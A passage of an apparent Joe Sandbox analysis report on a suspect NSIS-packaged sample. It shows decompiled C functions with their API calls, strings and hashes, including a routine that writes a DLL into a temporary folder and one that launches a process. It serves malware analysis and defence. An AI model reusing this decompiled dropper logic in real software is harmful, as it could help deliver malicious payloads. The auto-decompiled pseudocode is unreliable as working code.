                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                      • String ID:
                      • API String ID: 1849352358-0
                      • Opcode ID: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                      • Instruction ID: ad5020e38ef11d08f371025551c7f23f007b957d45941c5b52acf933ea75ddf9
                      • Opcode Fuzzy Hash: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                      • Instruction Fuzzy Hash: 31F0F9B2A04105BFD700EBA4EE89DAFB7BDEB44341B104476F601F21A0C7789D018B29
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404610, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                      Download Yara Rule
                      C-Code - Quality: 51%
                      			E00404610(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405AA7(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405AA7(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405AA7(_t34, 0, 0x420498, 0x420498, _a8);
				wsprintfA(_t26 + lstrlenA(0x420498), "%u.%u%s%s");
				return SetDlgItemTextA( *0x423678, _a4, 0x420498);
			}













                      0x00404618
                      0x0040461c
                      0x00404624
                      0x00404627
                      0x00404628
                      0x0040462a
                      0x0040462c
                      0x0040462f
                      0x0040462f
                      0x00404636
                      0x0040463c
                      0x0040463c
                      0x00404643
                      0x0040464e
                      0x0040464f
                      0x00404652
                      0x00404652
                      0x0040465f
                      0x0040466a
                      0x0040466d
                      0x0040467f
                      0x00404686
                      0x00404687
                      0x00404696
                      0x004046a6
                      0x004046c2

                      APIs
                      • lstrlenA.KERNEL32(00420498,00420498,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404530,000000DF,0000040F,00000400,00000000), ref: 0040469E
                      • wsprintfA.USER32 ref: 004046A6
                      • SetDlgItemTextA.USER32 ref: 004046B9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: ItemTextlstrlenwsprintf
                      • String ID: %u.%u%s%s
                      • API String ID: 3540041739-3551169577
                      • Opcode ID: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                      • Instruction ID: 4c66ffa9968b47036da968d2f23bae361eeba693da1d293f62fa9500f86314f5
                      • Opcode Fuzzy Hash: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                      • Instruction Fuzzy Hash: 6211E6737001243BDB10A5699C45EAF3299DBC2335F14423BF625F61D1E9798C1186A9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00401BAD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                      Download Yara Rule
                      C-Code - Quality: 51%
                      			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029CB(3);
				 *(_t55 + 8) = E004029CB(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029E8(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029E8();
					_t28 = E004029E8();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029CB();
					_t37 = E004029CB();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E004059E3();
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                      0x00401bb6
                      0x00401bc2
                      0x00401bc5
                      0x00401bce
                      0x00401bce
                      0x00401bd1
                      0x00401bd5
                      0x00401bde
                      0x00401bde
                      0x00401be1
                      0x00401be5
                      0x00401be7
                      0x00401c34
                      0x00401c36
                      0x00401c3f
                      0x00401c47
                      0x00401c4a
                      0x00401c4a
                      0x00401c53
                      0x00000000
                      0x00401be9
                      0x00401bf0
                      0x00401bf2
                      0x00401bfa
                      0x00401bfd
                      0x00401c25
                      0x00401c59
                      0x00401c59
                      0x00401bff
                      0x00401c0d
                      0x00401c15
                      0x00401c18
                      0x00401c18
                      0x00401bfd
                      0x00401c5c
                      0x00401c5f
                      0x00401c65
                      0x00402825
                      0x00402825
                      0x00402880
                      0x0040288c

                      APIs
                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                      • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: MessageSend$Timeout
                      • String ID: !
                      • API String ID: 1777923405-2657877971
                      • Opcode ID: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                      • Instruction ID: c520659e647c29be31daea63823ecf32d675036654070bdfdaec67237a792274
                      • Opcode Fuzzy Hash: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                      • Instruction Fuzzy Hash: 902183B1A44104BEDF01AFB5CE5BAAD7A75EF45704F14047AF501B61D1D6B88940D728
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004052E5, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004052E5(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4224a0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                      0x004052ee
                      0x0040530a
                      0x00405312
                      0x00405317
                      0x00000000
                      0x0040531d
                      0x00405321

                      APIs
                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A0,Error launching installer), ref: 0040530A
                      • CloseHandle.KERNEL32(?), ref: 00405317
                      Strings
                      • Error launching installer, xrefs: 004052F8
                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004052E5
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: CloseCreateHandleProcess
                      • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                      • API String ID: 3712363035-2984075973
                      • Opcode ID: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                      • Instruction ID: 638c90c2c8bd3d8652662e5a24b63cb160f6dc818783434175b306b50d96cec4
                      • Opcode Fuzzy Hash: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                      • Instruction Fuzzy Hash: 32E0ECB4A00209BFDB00AF64ED09B6F7BBCFB04348F808522A911E2150D7B4E8148A69
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00405578, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00405578(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40900c);
				}
				return _t7;
			}




                      0x00405579
                      0x00405590
                      0x00405598
                      0x00405598
                      0x004055a0

                      APIs
                      • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 0040557E
                      • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405587
                      • lstrcatA.KERNEL32(?,0040900C), ref: 00405598
                      Strings
                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405578
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: CharPrevlstrcatlstrlen
                      • String ID: C:\Users\user\AppData\Local\Temp\
                      • API String ID: 2659869361-3916508600
                      • Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                      • Instruction ID: 4689f4cb8dc724d8b29f049f697397264ef60a28c46f00026a2de7c751f5ddbe
                      • Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                      • Instruction Fuzzy Hash: 17D0A962609A307EE20222159C05ECB2A08CF42301B048022F500B62D2C33C4D418FFE
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00401EC5, Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 85%
                      			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029E8(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E004059E3(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E004059E3(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}






                      0x00401ec7
                      0x00401ecf
                      0x00401ed4
                      0x00401ed9
                      0x00401edd
                      0x00401ee0
                      0x00401ee2
                      0x00401ee9
                      0x00401ef2
                      0x00401efa
                      0x00401efd
                      0x00401f12
                      0x00401f18
                      0x00401f2b
                      0x00401f34
                      0x00401f40
                      0x00401f45
                      0x00401f45
                      0x00401f2b
                      0x00401f48
                      0x00401b75
                      0x00401b75
                      0x00401efd
                      0x00402880
                      0x0040288c

                      APIs
                      • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                      • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                      • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                        • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                      • String ID:
                      • API String ID: 1404258612-0
                      • Opcode ID: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                      • Instruction ID: 32b4c4ba67c2d4aeec558e743cb191f9ba8cb92773df28d6a4a6bb64e08d8cf3
                      • Opcode Fuzzy Hash: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                      • Instruction Fuzzy Hash: 43111CB2900108BEDB01EFA5D945DAEBBB9EF04354B20807AF505F61E1D7789E54DB28
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00401D1B, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                      Download Yara Rule
                      C-Code - Quality: 67%
                      			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af6c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
				 *0x40af7c = E004029CB(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af83 = 1;
				 *0x40af80 = _t11 & 0x00000001;
				 *0x40af81 = _t11 & 0x00000002;
				 *0x40af82 = _t11 & 0x00000004;
				E00405AA7(_t18, _t24, _t26, 0x40af88,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af6c);
				_push(_t14);
				_push(_t26);
				E004059E3();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                      0x00401d29
                      0x00401d42
                      0x00401d4c
                      0x00401d51
                      0x00401d5c
                      0x00401d63
                      0x00401d75
                      0x00401d7b
                      0x00401d80
                      0x00401d8a
                      0x004024aa
                      0x00401561
                      0x00402825
                      0x00402880
                      0x0040288c

                      APIs
                      • GetDC.USER32(?), ref: 00401D22
                      • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                      • CreateFontIndirectA.GDI32(0040AF6C), ref: 00401D8A
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: CapsCreateDeviceFontIndirect
                      • String ID:
                      • API String ID: 3272661963-0
                      • Opcode ID: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                      • Instruction ID: 28934dfc7bc65fa7e96b773f26fd89147779a1e7d92ad1971070d574f64f8b8b
                      • Opcode Fuzzy Hash: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                      • Instruction Fuzzy Hash: 3AF0AFF0A48341AEE7009770AE1ABAA3B64A715305F104535F582BA1E2C6BC04159F3F
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404D73, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00404D73(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420480 != _t22) {
							 *0x420480 = _t22;
							E00405A85(0x420498, 0x424000);
							E004059E3(0x424000, _t22);
							E0040140B(6);
							E00405A85(0x424000, 0x420498);
						}
						L11:
						return CallWindowProcA( *0x420488, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004046F2(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403E83(0x413);
				return 0;
			}




                      0x00404d7f
                      0x00404da4
                      0x00404dc4
                      0x00404dc7
                      0x00404dca
                      0x00404de1
                      0x00404de7
                      0x00404dee
                      0x00404df5
                      0x00404dfc
                      0x00404e01
                      0x00404e07
                      0x00000000
                      0x00404e17
                      0x00404db1
                      0x00404e04
                      0x00404e04
                      0x00000000
                      0x00404e04
                      0x00404dbd
                      0x00404dbf
                      0x00000000
                      0x00404dbf
                      0x00404d85
                      0x00000000
                      0x00000000
                      0x00404d8c
                      0x00000000

                      APIs
                      • IsWindowVisible.USER32 ref: 00404DA9
                      • CallWindowProcA.USER32 ref: 00404E17
                        • Part of subcall function 00403E83: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403E95
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: Window$CallMessageProcSendVisible
                      • String ID:
                      • API String ID: 3748168415-3916222277
                      • Opcode ID: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                      • Instruction ID: ec2fcea156de3e0d4d2633a939c9d5c5ec8f09c93be26486dc307f4b459a9b20
                      • Opcode Fuzzy Hash: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                      • Instruction Fuzzy Hash: B5116A71600208BBDB21AF51DC409AB3A69AB84769F00853AFB14691E2C3799D919FA9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004024B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029E8(0x11));
				} else {
					E004029CB(1);
					 *0x409f68 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E004059FC(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp\nsx7FAF.tmp\mtmmtvzho.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                      0x004024b0
                      0x004024b0
                      0x004024b3
                      0x004024ce
                      0x004024b5
                      0x004024b7
                      0x004024bc
                      0x004024c3
                      0x004024d5
                      0x0040264e
                      0x0040264e
                      0x004024db
                      0x004024ed
                      0x004015a6
                      0x004015a8
                      0x00000000
                      0x004015ae
                      0x004015a8
                      0x00402880
                      0x0040288c

                      APIs
                      • lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
                      • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsx7FAF.tmp\mtmmtvzho.dll,00000000,?,?,00000000,00000011), ref: 004024ED
                      Strings
                      • C:\Users\user\AppData\Local\Temp\nsx7FAF.tmp\mtmmtvzho.dll, xrefs: 004024BC, 004024E1
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: FileWritelstrlen
                      • String ID: C:\Users\user\AppData\Local\Temp\nsx7FAF.tmp\mtmmtvzho.dll
                      • API String ID: 427699356-1113509814
                      • Opcode ID: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                      • Instruction ID: fedee9c099d2663b98e8dec203c278837a510ba70d8909219c610135afd3ad6f
                      • Opcode Fuzzy Hash: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                      • Instruction Fuzzy Hash: 89F0E9B2A44245BFD700EBF19E499AF36689B00345F20443BB141F50C2D6BC89419B2D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004055BF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004055BF(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                      0x004055c0
                      0x004055ca
                      0x004055cc
                      0x004055d3
                      0x004055db
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004055db
                      0x004055dd
                      0x004055e2

                      APIs
                      • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\nji3Lg1ot6.exe,C:\Users\user\Desktop\nji3Lg1ot6.exe,80000000,00000003), ref: 004055C5
                      • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\nji3Lg1ot6.exe,C:\Users\user\Desktop\nji3Lg1ot6.exe,80000000,00000003), ref: 004055D3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: CharPrevlstrlen
                      • String ID: C:\Users\user\Desktop
                      • API String ID: 2709904686-1669384263
                      • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                      • Instruction ID: 41873d5d9910b4adf2dd72edffcb0a7ece880f135012a8254964d84567f142cd
                      • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                      • Instruction Fuzzy Hash: 54D05E62408AB02EE30252109C00B8F7A98CB16300F194462E040A6194C2784C418EB9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004056D1, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004056D1(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

